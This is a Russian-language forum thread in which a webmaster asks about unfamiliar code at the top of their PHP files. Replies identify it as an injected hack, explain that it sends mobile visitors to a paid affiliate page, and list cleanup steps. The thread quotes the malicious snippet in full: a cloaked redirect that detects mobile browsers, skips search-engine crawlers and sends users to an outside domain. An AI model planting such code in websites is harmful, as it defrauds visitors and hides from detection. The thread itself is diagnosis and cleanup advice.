Что за не аброкадабра вначале php кода

Взломали вас, батенька.

Надеюсь, это не из вашей CMS.

if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script>window.location="http://mobile-mobi.info/?2"</script>'; flush(); exit; }

Код переадресовывает моб. траф

UPD: Не успел)

а куда переадресовывает?

Он перебрасывает мобильных пользователей на партнёрку, где переброшенные должны заплатить бабло.

Yurecm, да, батенька, уж.... я теперь боюсь :)

скорее всего просто угнали пасы от фтп, потому что на компе у кое кого вирусня.

если бы ломали конкретный движок, то и вставка вредоносного кода была бы более качественная, а не тупо в начало index.php

есть и на ней, есть и на инклудах)))

вообщем все сайта на одном хосте, на других нет.

....скоро появится и на других. Доказано печальным опытом.

1. Качай касперского, чисти домашний компьютер до упора

2. Меняй все пароли которые существуют

3. Заливай чистые движки

4. Качай айболит и проверяй все, что шевелится

5. Ставь пароли на все папки, которые увидишь

ИТД ИТП

мдамс. Тоже была обнаружена такая бяка на некоторых сайтах сегодня... Яндекс 1ой строкой выдал этот топик. Надо искать мастера..